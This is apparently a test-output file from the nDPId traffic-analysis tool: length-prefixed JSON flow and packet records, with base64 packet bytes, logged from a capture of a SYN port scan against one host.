-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsT1UAACkG0B2sEAAIQA2GNIzTBNzdU4MZAAAAAGACCAArsAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsowkAAC0GeGmsEAAIQA2GNIzTAprdU4MZAAAAAGACCAAt8gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsNmQAAC4G5A6sEAAIQA2GNIzTCU7dU4MZAAAAAGACDAAjPgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAslb0AACYGjLWsEAAIQA2GNIzTDSndU4MZAAAAAGACDAAfYwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs9egAADAGIoqsEAAIQA2GNIzTABrdU4MZAAAAAGACBAA0cgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpsAACcGGtisEAAIQA2GNIzTX3zdU4MZAAAAAGACEADJDwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsFHoAADIGAfmsEAAIQA2GNIzTDubdU4MZAAAAAGACDAAdpgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAshuMAADUGjI+sEAAIQA2GNIzTGivdU4MZAAAAAGACCAAWYQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsa28AACwGsQOsEAAIQA2GNIzTABHdU4MZAAAAAGACBAA0ewAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs1BIAADMGQWCsEAAIQA2GNIzTFF7dU4MZAAAAAGACEAAULgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyOsAADQGS4esEAAIQA2GNIzSEyPdUoMYAAAAAGACBAAhbAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMVIAACcG8CCsEAAIQA2GNIzSzoXdUoMYAAAAAGACEABaCQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMDcAADAG6DusEAAIQA2GNIzSD6bdUoMYAAAAAGACBAAk6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs8eUAADYGII2sEAAIQA2GNIzSDaXdUoMYAAAAAGACDAAe6gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsK+QAADAG7I6sEAAIQA2GNIzSDpndUoMYAAAAAGACBAAl9gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbD8AACsGsTOsEAAIQA2GNIzSFGXdUoMYAAAAAGACEAAUKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsX\/kAACUGw3msEAAIQA2GNIzSE9jdUoMYAAAAAGACCAActwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs3xYAACYGQ1ysEAAIQA2GNIzSB+TdUoMYAAAAAGACDAAkqwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbhsAAC8Gq1esEAAIQA2GNIzSu9DdUoMYAAAAAGACEABsvgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgMAADsG62+sEAAIQA2GNIzSTv7dUoMYAAAAAGACEADZkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyKUAACsGVM2sEAAIQA2GNIzSF0vdUoMYAAAAAGACEAARRAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzMAADQGpT+sEAAIQA2GNIzSBfTdUoMYAAAAAGACBAAumwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsq8MAADUGZ6+sEAAIQA2GNIzSBILdUoMYAAAAAGACCAAsDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsphAAADsGZ2KsEAAIQA2GNIzSH5bdUoMYAAAAAGACEAAI+QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsMxUAADMG4l2sEAAIQA2GNIzSBBfdUoMYAAAAAGACEAAkeAAAAgQFtA=="} 